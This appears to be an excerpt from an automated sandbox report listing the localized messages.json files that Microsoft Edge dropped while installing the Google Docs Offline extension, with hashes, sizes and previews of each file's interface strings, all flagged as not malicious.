SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
